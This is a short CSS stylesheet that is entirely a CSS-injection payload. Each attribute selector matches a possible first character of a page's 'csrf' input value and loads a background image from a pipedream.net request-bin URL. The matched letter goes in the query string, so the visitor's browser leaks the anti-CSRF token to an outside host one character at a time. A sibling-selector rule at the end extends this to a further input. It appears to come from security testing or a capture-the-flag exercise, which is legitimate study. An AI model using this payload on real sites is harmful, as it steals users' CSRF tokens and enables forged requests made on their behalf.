input[name="csrf"][value^="a"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?q=a)
}

input[name="csrf"][value^="b"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?q=b)
}

input[name="csrf"][value^="c"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?q=c)
}

input[name="csrf"][value^="d"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?q=d)
}

input[name="csrf"][value^="y"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?q=y)
}

input[name="csrf"][value^="z"] {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?q=z)
}


input[name="csrf"][value^="y"] + input {
  background: url(https://en6gc9c8vfzvo.x.pipedream.net/?qq=y)
}